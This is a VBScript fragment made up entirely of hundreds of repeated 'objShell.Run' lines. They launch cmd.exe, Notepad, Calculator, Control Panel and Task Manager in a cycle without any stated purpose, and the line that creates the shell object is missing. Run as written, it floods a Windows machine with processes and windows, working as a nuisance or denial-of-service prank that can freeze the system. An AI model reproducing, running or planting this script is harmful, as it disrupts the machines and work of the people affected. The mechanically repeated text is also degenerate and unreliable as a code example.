objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
